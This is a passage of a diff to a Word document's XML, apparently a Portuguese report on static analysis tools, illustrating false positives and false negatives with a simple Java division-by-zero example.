         </w:rPr>
         <w:t>Falsos positivos e negativos</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="13"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5788,7 +6398,401 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
+        <w:t>public class Division {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    public static double </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>divide(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>double a, double b) {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>if</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (b == 0) </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>{</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> /</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/ aqui exsite uma </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>proteção</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> mas não está a ser validada pela ferramenta</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            throw new IllegalArgumentException("Não é possível dividir por zero");</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        }</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">        return a / b;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> // o que pode causar que este método/linha seja um falso positivo</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    public static void </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>main(String[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">] </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>args</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>) {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>System.out.println</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>divide(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>4, 2)</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>System.out.println</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>divide(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>4, 0)</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>No entanto um falso negativo ocorre quando a ferramenta não apanha uma vulnerabiliade real no código, utilizando o mesmo exemplo:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
         <w:t>public class Division {</w:t>
       </w:r>
     </w:p>
@@ -5823,7 +6827,88 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        return a / </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>b;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    }</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    public static void </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>main(String[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">] </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>args</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>) {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -5836,126 +6921,105 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>if</w:t>
+        </w:rPr>
+        <w:t>System.out.println</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (b == 0) </w:t>
+        </w:rPr>
+        <w:t>(</w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>{</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> /</w:t>
+        </w:rPr>
+        <w:t>divide(</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">/ aqui exsite uma </w:t>
+        </w:rPr>
+        <w:t>4, 2)</w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>proteção</w:t>
+        </w:rPr>
+        <w:t>);</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> mas não está a ser validada pela ferramenta</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">            throw new IllegalArgumentException("Não é possível dividir por zero");</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        }</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        return a / b;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> // o que pode causar que este método/linha seja um falso positivo</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>System.out.println</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>divide(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>4, 0)</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:t>}</w:t>
       </w:r>
@@ -5964,484 +7028,62 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    public static void </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>main(String[</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve">] </w:t>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Se a ferramenta não identificar esta vulnerabilidade pode causar um erro de execução em runtime e, por exemplo, expor informações sobre a aplicacação (o </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>args</w:t>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>stack</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>) {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        </w:t>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>System.out.println</w:t>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>tecnologico</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>divide(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>4, 2)</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>);</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>System.out.println</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
